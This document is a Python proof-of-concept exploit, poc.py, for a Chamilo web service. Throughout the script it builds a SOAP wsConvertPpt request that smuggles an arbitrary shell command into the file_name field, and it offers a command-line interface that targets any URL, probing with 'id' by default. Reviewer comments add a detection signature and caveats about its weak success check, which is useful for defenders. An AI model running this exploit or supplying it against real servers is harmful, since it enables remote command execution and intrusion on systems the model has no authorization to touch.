poc.py
import argparse
import requests
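def execute_command(url, command):
    """Send one SOAP ``wsConvertPpt`` request and report whether the endpoint answered.

    The request is POSTed to ``<url>/main/webservices/additional_webservices.php``
    with ``command`` placed inside the ``file_name`` value of the SOAP map.

    Args:
        url: Base URL of the Chamilo installation; also used as the ``ns1``
            XML namespace in the envelope.
        command: Text interpolated into the ``file_name`` value.

    Returns:
        True when the server replies with HTTP 200 and the response text
        contains ``wsConvertPptResponse``; False otherwise, including when
        the request itself fails.

    NOTE(review): the success check never reads any command output. A True
    result shows only that the web service processed the SOAP call, so it is
    a weak indicator on its own; confirm against the installed version and
    server-side logs before treating a host as affected.

    For defenders: this traffic is a POST to the path above with a
    ``text/xml`` body whose ``file_name`` value carries shell metacharacters,
    which is a usable signature for web-server log review and WAF rules.
    """
    body = '''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}`.pptx</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)
    try:
        response = requests.post(
            '{}/main/webservices/additional_webservices.php'.format(url),
            data=body,
            headers={'Content-Type': 'text/xml; charset=utf-8'},
        )
    except requests.RequestException:
        # Only transport/URL errors count as "no answer". The original bare
        # ``except:`` also swallowed KeyboardInterrupt and programming errors.
        return False
    return response.status_code == 200 and "wsConvertPptResponse" in response.text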
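# Command-line entry point: -u/--url is required, -c/--command is optional.
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Url of your Chamilo", required=True)
parser.add_argument("-c", "--command", help="Command to execute", required=False)
args = parser.parse_args()

# NOTE(review): both verdicts below rest only on execute_command()'s response
# check (HTTP 200 plus the "wsConvertPptResponse" marker). No command output is
# read back, so "vulnerable" / "Command executed" are not confirmed by this
# script.
if args.command is None:
    # No command supplied: probe with the fixed value 'id'.
    if execute_command(args.url, 'id'):
        print(f"URL vulnerable: {args.url}")
    else:
        print(f"URL not vulnerable: {args.url}")
else:
    # The original followed this with ``elif args.command is not None`` and a
    # final ``else`` that could never run; the two cases are exhaustive.
    if execute_command(args.url, args.command):
        print(f"Command executed: {args.command}")
    else:
        print(f"An error has occured, url is not vulnerable: {args.url}")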